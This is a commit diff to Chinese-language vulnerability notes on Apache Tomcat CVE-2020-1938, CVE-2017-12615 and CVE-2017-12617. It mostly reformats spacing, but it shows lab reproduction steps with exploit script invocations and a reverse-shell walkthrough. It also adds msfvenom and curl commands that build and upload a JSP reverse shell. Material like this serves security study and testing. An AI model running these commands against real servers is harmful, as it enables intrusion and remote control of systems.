update

Author: Threekiii

中间件漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md

@@ -24,13 +24,13 @@ Apache Tomcat 9 < 9.0.31
 
 ## 环境搭建
 
-Vulhub执行如下命令启动一个Tomcat 9.0.30：
+Vulhub 执行如下命令启动一个 Tomcat 9.0.30：
 
 ```
 docker-compose up -d
 ```
 
-环境启动后，访问`http://your-ip:8080`即可查看tomcat默认页面，此时通过AJP协议的8009端口亦可访问Tomcat。
+环境启动后，访问 `http://your-ip:8080` 即可查看 tomcat 默认页面，此时通过 AJP 协议的 8009 端口亦可访问 Tomcat。
 
 ## 漏洞复现
 
@@ -39,33 +39,33 @@ docker-compose up -d
 - https://github.com/chaitin/xray
 - https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
 
-通过漏洞POC[CNVD-2020-10487-Tomcat-Ajp-lfi](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi)进行测试，注意，代码基于python2环境。
+通过漏洞 POC[CNVD-2020-10487-Tomcat-Ajp-lfi](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi) 进行测试，注意，代码基于 python2 环境。
 
-读取WEB-INF/web.xml文件：
+读取 WEB-INF/web.xml 文件：
 
 ![image-20220302160031354](images/202203021600655.png)
 
-在docker的ROOT目录下新建文件用来测试是否可以成功读取，首先进入容器新建一个flag.txt文件：
+在 docker 的 ROOT 目录下新建文件用来测试是否可以成功读取，首先进入容器新建一个 flag.txt 文件：
 
 ```
 [root@VM-16-16-centos CVE-2020-1938]# docker exec -it fbe4 /bin/bash
 root@fbe43a63b620:/usr/local/tomcat# cd webapps/ROOT/
 root@fbe43a63b620:/usr/local/tomcat/webapps/ROOT# echo "flag{Woooooooo}" > flag.txt
 ```
 
-执行CNVD-2020-10487-Tomcat-Ajp-lfi.py读取flag.txt文件，读取成功：
+执行 CNVD-2020-10487-Tomcat-Ajp-lfi.py 读取 flag.txt 文件，读取成功：
 
 ```
 python CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 8009 -f flag.txt
 ```
 
 ![image-20220412145606643](images/image-20220412145606643.png)
 
-### 反弹shell
+### 反弹 shell
 
-该漏洞需要配合文件上传漏洞才能利用，假设服务器已经有了存在一个txt文件，里面的内容可以执行任意命令（实际情况中，要利用目标服务器的文件上传功能上传文件）。 
+该漏洞需要配合文件上传漏洞才能利用，假设服务器已经有了存在一个 txt 文件，里面的内容可以执行任意命令（实际情况中，要利用目标服务器的文件上传功能上传文件）。
 
-构造payload：
+构造 payload：
 
 ![image-20220412151753346](images/image-20220412151753346.png)
 
@@ -82,29 +82,29 @@ python CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 8009 -f flag.txt
 
 ```
 
-将内容保存在txt文件里，使用命令将txt文件复制到服务器的ROOT路径：
+将内容保存在 txt 文件里，使用命令将 txt 文件复制到服务器的 ROOT 路径：
 
 ```
 [root@VM-16-16-centos CVE-2020-1938]# docker cp shell.txt fbe4:/usr/local/tomcat/webapps/ROOT/
 ```
 
-要想实现文件包含，必须要运行包含的文件，所以目标文件需要是jsp。
+要想实现文件包含，必须要运行包含的文件，所以目标文件需要是 jsp。
 
-此处需要修改CNVD-2020-10487-Tomcat-Ajp-lfi.py脚本中的文件名asdf为asdf.jsp：
+此处需要修改 CNVD-2020-10487-Tomcat-Ajp-lfi.py 脚本中的文件名 asdf 为 asdf.jsp：
 
 ![image-20220412151136832](images/image-20220412151136832.png)
 
-执行CNVD-2020-10487-Tomcat-Ajp-lfi.py读取shell.txt文件，执行反弹shell命令：
+执行 CNVD-2020-10487-Tomcat-Ajp-lfi.py 读取 shell.txt 文件，执行反弹 shell 命令：
 
 ```
 python CNVD-2020-10487-Tomcat-Ajp-lfi-shell.py 127.0.0.1 -p 8009 -f shell.txt
 ```
 
-监听6666端口，成功接收反弹shell：
+监听 6666 端口，成功接收反弹 shell：
 
 ![image-20220412152039391](images/image-20220412152039391.png)
 
-## 漏洞POC
+## 漏洞 POC
 
 ```python
 #!/usr/bin/env python
@@ -410,4 +410,3 @@ _,data = t.perform_request('/asdf',attributes=[
 print('----------------------------')
 print("".join([d.data for d in data]))
 ```
-

…he Tomcat PUT方法任意写文件漏洞 CVE-2017-12615.md …e Tomcat PUT 方法任意写文件漏洞 CVE-2017-12615.md中间件漏洞/Apache Tomcat PUT方法任意写文件漏洞 CVE-2017-12615.md renamed to 中间件漏洞/Apache Tomcat PUT 方法任意写文件漏洞 CVE-2017-12615.md 中间件漏洞/Apache Tomcat PUT方法任意写文件漏洞 CVE-2017-12615.md renamed to 中间件漏洞/Apache Tomcat PUT 方法任意写文件漏洞 CVE-2017-12615.md

@@ -1,14 +1,16 @@
-# Apache Tomcat PUT方法任意写文件漏洞 CVE-2017-12615
+# Apache Tomcat PUT 方法任意写文件漏洞 CVE-2017-12615
 
 ## 漏洞描述
 
+2017 年 9 月 19 日，Apache Tomcat 官方确认并修复了两个高危漏洞，其中就有远程代码执行漏洞 (CVE-2017-12615)。当 启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件，JSP 文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
+
 参考：
 
 - http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
 - https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
 - https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
 
-漏洞本质Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件：
+漏洞本质 Tomcat 配置了可写（readonly=false），导致我们可以往服务器写文件：
 
 ```
 <servlet>
@@ -30,7 +32,7 @@
 </servlet>
 ```
 
-虽然Tomcat对文件后缀有一定检测（不能直接写jsp），但我们使用一些文件系统的特性（如Linux下可用`/`）来绕过了限制。
+虽然 Tomcat 对文件后缀有一定检测（不能直接写 jsp），但我们使用一些文件系统的特性（如 Linux 下可用 `/`）来绕过了限制。
 
 ## 漏洞影响
 
@@ -40,18 +42,18 @@ Apache Tomcat 7.0.0-7.0.81（默认配置）
 
 ## 环境搭建
 
-Vulhub启动Tomcat 8.5.19环境：
+Vulhub 启动 Tomcat 8.5.19 环境：
 
 ```
 docker-compose build
 docker-compose up -d
 ```
 
-运行完成后访问`http://your-ip:8080`即可看到Tomcat的Example页面。
+运行完成后访问 `http://your-ip:8080` 即可看到 Tomcat 的 Example 页面。
 
 ## 漏洞复现
 
-直接发送以下数据包即可在Web根目录写入shell：
+直接发送以下数据包即可在 Web 根目录写入 shell：
 
 ```
 PUT /2.jsp/ HTTP/1.1
@@ -76,4 +78,17 @@ int a = -1; byte[] b = new byte[2048]; out.print("<pre>");
 
 如下：
 
-![image-20220302155053358](images/202203021550397.png)
+![image-20220302155053358](images/202203021550397.png)
+
+也可以用 PUT 方式上传。注意，最后一个 `/` 字符不可省略：
+
+```shell
+# msf生成jsp木马
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=9999 -f raw > shell.jsp
+
+# 通过PUT上传
+curl -v -X PUT --data-binary @shell.jsp "http://your-ip:8080/shell.jsp/"
+
+# 通过DELETE删除
+curl -v -X DELETE "http://your-ip:8080/shell.jsp/"
+```

…ache Tomcat RCE via JSP Upload Bypass.md … via JSP Upload Bypass CVE-2017-12617.md中间件漏洞/Apache Tomcat RCE via JSP Upload Bypass.md renamed to 中间件漏洞/Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617.md 中间件漏洞/Apache Tomcat RCE via JSP Upload Bypass.md renamed to 中间件漏洞/Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617.md

@@ -2,7 +2,7 @@
 
 ## 漏洞描述
 
-Apache Tomcat版本9.0.0.M1至9.0.0、8.5.0至8.5.22、8.0.0.RC1至8.0.46和7.0.0至7.0.81且启用HTTP PUT时（例如，通过设置只读如果将Default servlet的初始化参数设置为false，则可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP，并且服务器将执行其中包含的所有代码。
+Apache Tomcat 版本 9.0.0.M1 至 9.0.0、8.5.0 至 8.5.22、8.0.0.RC1 至 8.0.46 和 7.0.0 至 7.0.81 且启用 HTTP PUT 时（例如，通过设置只读如果将 Default servlet 的初始化参数设置为 false，则可以通过特制请求将 JSP 文件上载到服务器。然后可以请求此 JSP，并且服务器将执行其中包含的所有代码。
 
 ## 漏洞影响
 
@@ -13,7 +13,7 @@ Apache Tomcat版本8.0.0.RC1至8.0.46
 Apache Tomcat版本7.0.0至7.0.81
 ```
 
-## 漏洞EXP
+## 漏洞 EXP
 
 ```python
 #!/usr/bin/python
@@ -256,6 +256,3 @@ else:
             if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
                 print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
 ```
-
-
-